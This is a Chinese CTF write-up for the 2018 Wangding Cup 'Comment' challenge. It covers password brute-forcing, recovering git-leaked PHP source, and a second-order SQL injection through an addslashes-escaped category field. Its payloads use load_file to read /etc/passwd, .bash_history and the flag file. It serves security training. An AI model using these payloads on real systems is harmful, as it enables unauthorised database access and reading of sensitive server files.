审计练习14——[网鼎杯 2018]Comment
程序员文章站
2022-05-19 10:00:59
...
平台:buuoj.cn
打开靶机是个留言板
发帖需要登录,只缺密码的后三位,burp**即可
扫下目录
git泄露,githacker源码下下来
write_do.php
显示不全
历史文件恢复一下
完整代码如下
<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
header("Location: ./login.php");
die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
$category = addslashes($_POST['category']);
$title = addslashes($_POST['title']);
$content = addslashes($_POST['content']);
$sql = "insert into board
set category = '$category',
title = '$title',
content = '$content'";
$result = mysql_query($sql);
header("Location: ./index.php");
break;
case 'comment':
$bo_id = addslashes($_POST['bo_id']);
$sql = "select category from board where id='$bo_id'";
$result = mysql_query($sql);
$num = mysql_num_rows($result);
if($num>0){
$category = mysql_fetch_array($result)['category'];
$content = addslashes($_POST['content']);
$sql = "insert into comment
set category = '$category',
content = '$content',
bo_id = '$bo_id'";
$result = mysql_query($sql);
}
header("Location: ./comment.php?id=$bo_id");
break;
default:
header("Location: ./index.php");
}
}
else{
header("Location: ./index.php");
}
?>
可以看到addslashes给每个参数都进行了处理
但数据库存入的数据是会自动做过滤处理的,也就是说数据还是会原样插入到数据库中
而这部分
mysql_fetch_array直接调用category,造成二次注入。
构造
进入留言板在content构造*/#提交
此时数据库语句是
$sql = "insert into comment
set category = 'aaa',content=database(),/*',
content = '*/#',
bo_id = '$bo_id'";
后面的*/#和前一个末尾/*拼接把后面的都注释掉
就成了
$sql = "insert into comment
set category = 'aaa',
content=database(),
成功读取数据库
解题
load_file读文件位置
aaa',content=(select( load_file('/etc/passwd'))),/*
查看使用过的系统命令
aaa',content=(select(load_file("/home/www/.bash_history"))),/*
十六进制读.DS.Store
aaa',content=(select hex(load_file("/tmp/html/.DS_Store"))),/*
读flag_8946e1ff1ee3e40f.php
aaa',content=(select hex(load_file('/var/www/html/flag_8946e1ff1ee3e40f.php'))),/*
ps:tmp/html文件下读出来的flag是假的
解码即得flag